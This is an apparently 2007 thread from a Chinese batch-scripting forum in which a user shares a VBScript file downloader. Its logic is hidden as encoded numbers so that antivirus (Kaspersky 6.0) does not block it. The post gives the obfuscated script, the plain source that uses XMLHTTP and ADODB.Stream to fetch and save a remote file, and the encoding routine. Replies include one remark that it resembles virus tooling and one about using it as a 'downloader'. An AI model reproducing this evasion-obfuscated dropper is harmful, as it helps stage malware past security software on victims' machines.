标题: [原创] 真正能绕过杀软下载文件的VBS[原创加密版] [打印本页]
作者: somebody 时间: 2007-12-31 00:07 标题: 真正能绕过杀软下载文件的VBS[原创加密版]
代码使用说明:
CMD下执行以下命令即可下载单个远程文件,测试环境:windows 2003 + Kaspersky 6.0
cscript //nologo encode.vbs "http://kimhoo.lin.googlepages.com/encode.jpg" "d:\a bc\somebody.jpg"
PS: 1. 无论是网络路径还是本地路径,只要路径里含有空格或特殊字符,就必须用双引号括起来,最好括起来可以保证不出错。
2. 想看源代码,将 Execute Decode(str) 改为 Wscript.Echo Decode(str) 然后以同样方法运行。- Wscript.Sleep 1000
- Mystr = Array(115,111,109,101,98,111,100,121)
- for i=0 to Ubound(Mystr)
- author=author&Chr(Mystr(i))
- next
- Wscript.Echo vbCr
- Wscript.Echo " code by " & author
- Wscript.Echo " LastModified: 2007-12-30 22:00"
- Wscript.Sleep 2000
- Wscript.Echo vbCr
- str1 = " ╭━━╮╭━━╮╭╭━╮╭━━╮╭━━╮╭━━╮┏━━╮╭╮╭╮"
- str4 = " ╰━╮┃┃┃┃┃┃╭╮┃┃╭━╯┃╭╮╮┃┃┃┃┃┃┃┃?┃┃?"
- str6 = " ╰━━╯╰━━╯╰╯╰╯╰━━╯╰━━╯╰━━╯┗━━╯?╰╯?"
- str3 = " ┃╰━╮┃┃┃┃┃┃┃┃┃╰━╮┃╰╯╯┃┃┃┃┃┃┃┃╰╮╭╯"
- str5 = " ╭━╯┃┃╰╯┃┃┃┃┃┃╰━╮┃╰╯┃┃╰╯┃┃╰╯┃?┃┃?"
- str2 = " ┃╭━╯┃╭╮┃┃??┃┃╭━╯┃╭╮┃┃╭╮┃┃╭╮┃┃╰╯┃"
- myArray = Array(str1,str2,str3,str4,str5,str6)
- For each sign in myArray
- Wscript.Echo sign
- Next
- Wscript.Sleep 2000
- str="370,1160,960,1130,300,1000,1030,1060,990,300,1000,1090,1120,300,980,1090,1170,1080,1060,1090,950,980,1030,1080,1010,300,
- 1170,1030,1140,1020,300,630,810,650,710,710,300,990,1080,970,1090,980,1030,1080,1010,300,1140,1090,300,950,1160,1090,1030,980
- ,300,950,1080,1140,1030,430,1160,1030,1120,1150,1130,370,1130,300,1030,1080,1140,990,1120,1120,1150,1100,1140,1030,1090,1080,
- 110,80,370,970,1090,980,990,300,960,1190,300,1130,1090,1070,990,960,1090,980,1190,110,80,370,1140,990,1130,1140,1030,1080,101
- 0,300,990,1080,1160,1030,1120,1090,1080,1070,990,1080,1140,560,300,850,1030,1080,980,1090,1170,1130,300,480,460,460,490,300,4
- 10,300,730,950,1130,1100,990,1120,1130,1050,1190,300,520,440,460,110,80,770,1080,300,670,1120,1120,1090,1120,300,800,990,1130
- ,1150,1070,990,300,760,990,1180,1140,110,80,660,1030,1070,300,1030,800,990,1070,1090,"
- str=str&"1140,990,420,1030,740,1090,970,950,1060,110,80,1030,800,990,1070,1090,1140,990,300,590,300,740,650,950,1130,990,380,
- 850,810,970,1120,1030,1100,1140,440,630,1120,1010,1150,1070,990,1080,1140,1130,380,460,390,390,110,80,1030,740,1090,970,950,1
- 060,300,590,300,740,650,950,1130,990,380,850,810,970,1120,1030,1100,1140,440,630,1120,1010,1150,1070,990,1080,1140,1130,380,4
- 70,390,390,110,80,810,990,1140,300,780,1130,1090,1070,990,960,1090,980,1190,300,590,300,650,1120,990,950,1140,990,770,960,104
- 0,990,970,1140,380,320,750,1030,970,1120,1090,1130,1090,1000,1140,440,860,750,740,700,820,820,780,320,390,110,80,780,1130,109
- 0,1070,990,960,1090,980,1190,440,770,1100,990,1080,300,320,690,990,1140,320,420,1030,800,990,1070,1090,1140,990,420,460,110,8
- 0,780,1130,1090,1070,990,960,1090,980,1190,440,810,990,1080,980,380,390,110,80,810,990,"
- str=str&"1140,300,690,1130,1090,1070,990,960,1090,980,1190,300,590,300,650,1120,990,950,1140,990,770,960,1040,990,970,1140,38
- 0,320,630,980,1090,980,960,440,810,1140,1120,990,950,1070,320,390,110,80,690,1130,1090,1070,990,960,1090,980,1190,440,750,109
- 0,980,990,300,590,300,490,110,80,690,1130,1090,1070,990,960,1090,980,1190,440,820,1190,1100,990,300,590,300,470,110,80,690,11
- 30,1090,1070,990,960,1090,980,1190,440,770,1100,990,1080,380,390,110,80,690,1130,1090,1070,990,960,1090,980,1190,440,850,1120
- ,1030,1140,990,380,780,1130,1090,1070,990,960,1090,980,1190,440,800,990,1130,1100,1090,1080,1130,990,640,1090,980,1190,390,11
- 0,80,690,1130,1090,1070,990,960,1090,980,1190,440,810,950,1160,990,820,1090,680,1030,1060,990,300,1030,740,1090,970,950,1060,
- 420,480,110"
- Execute Decode(str)
- Wscript.Echo Wscript.Arguments(0) &" 已经成功下载完毕并保存到 "& Wscript.Arguments(1)
- Function Decode(code)
- iArray=Split(code,",")
- For i=0 To Ubound(iArray)-1
- trueStr=trueStr&Chr(iArray(i)/10+2)
- Next
- Decode=trueStr
- End function
复制代码
ASCII加密过程:- str="115,111,109,101,98,111,100,121" ' str 的内容是 somebody
- Wscript.Echo Encode(str)
- Function Encode(code)
- iArray=Split(code,",")
- For i=0 To ubound(iArray)-1
- s=(iArray(i)-2)*10
- p=p&s&","
- Next
- Encode=p
- End function
复制代码
附: 字符串/ASCII 互转工具
作者: youxi01 时间: 2007-12-31 00:21
年轻人,还是走"正道"啊,怎么总喜欢玩什么 病毒类\黑客类的东西呢?
呵呵
作者: somebody 时间: 2007-12-31 14:31
靠~~汗死
什么病毒类...下载文件的VBS并不是什么病毒,只是调用了Microsoft.XMLHTTP
杀软爱管闲事喜欢插上一手,所以不加密是下不了东西的...- 'vbs file for downloading with ASCII encoding to avoid anti-virus's interruption
- 'code by somebody
- 'testing environment: Windows 2003 + Kaspersky 6.0
- On Error Resume Next
- Dim iRemote,iLocal
- iRemote = LCase(WScript.Arguments(0))
- iLocal = LCase(WScript.Arguments(1))
- Set Psomebody = CreateObject("Microsoft.XMLHTTP")
- Psomebody.Open "Get",iRemote,0
- Psomebody.Send()
- Set Gsomebody = CreateObject("Adodb.Stream")
- Gsomebody.Mode = 3
- Gsomebody.Type = 1
- Gsomebody.Open()
- Gsomebody.Write(Psomebody.ResponseBody)
- Gsomebody.SaveToFile iLocal,2
复制代码
这是源代码,你保存为VBS,开着杀软,运行得了才怪呢..~
[ 本帖最后由 somebody 于 2007-12-31 14:35 编辑 ]
作者: 6589600 时间: 2008-1-26 15:51
是啊 ,开着杀软下东西就是慢,呵呵,好代码就像鱼,吃好了 香,吃不好会被噎死
作者: 葱头 时间: 2008-4-22 20:36
大家说~~用下载者来下载怎样~~嘿嘿~~~
作者: Randy 时间: 2009-10-30 15:27
编译器错误:未结束的字符串常量 ??
作者: idctop 时间: 2009-12-16 08:59
自己写完后把字符串转换成ASCII码就行了嘛。
作者: diannaoleyuan 时间: 2010-12-2 12:31
汗。。。。不知道对我有没有用。。。顶个~~~~~
欢迎光临 批处理之家 (http://www.bathome.net/) |
Powered by Discuz! 7.2 |